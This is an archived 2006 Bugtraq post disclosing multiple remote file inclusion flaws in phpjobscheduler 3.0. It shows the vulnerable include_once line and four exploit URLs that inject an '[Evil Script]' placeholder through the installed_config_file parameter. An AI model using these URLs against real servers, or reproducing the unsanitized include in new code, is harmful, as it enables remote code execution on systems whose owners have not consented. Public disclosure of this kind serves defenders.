lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20061112064406.2785.qmail@securityfocus.com>
Date: 12 Nov 2006 06:44:06 -0000
From: Firewall1954@...mail.com
To: bugtraq@...urityfocus.com
Subject: Phpjobscheduler 3.0  - Multiple Remote File Include

======================================================================
# Phpjobscheduler 3.0  - Multiple Remote File Include by Firewall
                      

# Application Affect:
                   phpjobscheduler 3.0

# Source Code:             
                   http://scripts.ringsworld.com/development-tools/phpjobscheduler.v3.0.zip

# Code:
                   include_once($installed_config_file)
        
# ExPloit :
   http://www.site.com/phpjobschedule_PATH/add-modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/delete.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/phpjobscheduler.php?installed_config_file=[Evil Script]


# Contact:    
                   Firewall1954@...mail.com 

# GrEatZ :

|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH|CiberPunk|saok| 
|Cvir.System|napster|Matasanos|Zlevyn|Azrael|CyberAlexis| 
|NitroNet|Matasanos|SysRoot|_ANtrAX_|FaLENcE|Mnox|Xneo.System|

 "El ceviche y El pisco es peruano y jamas podran igualar su calidad" 
                         "Viva el Peru"

======================================================================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ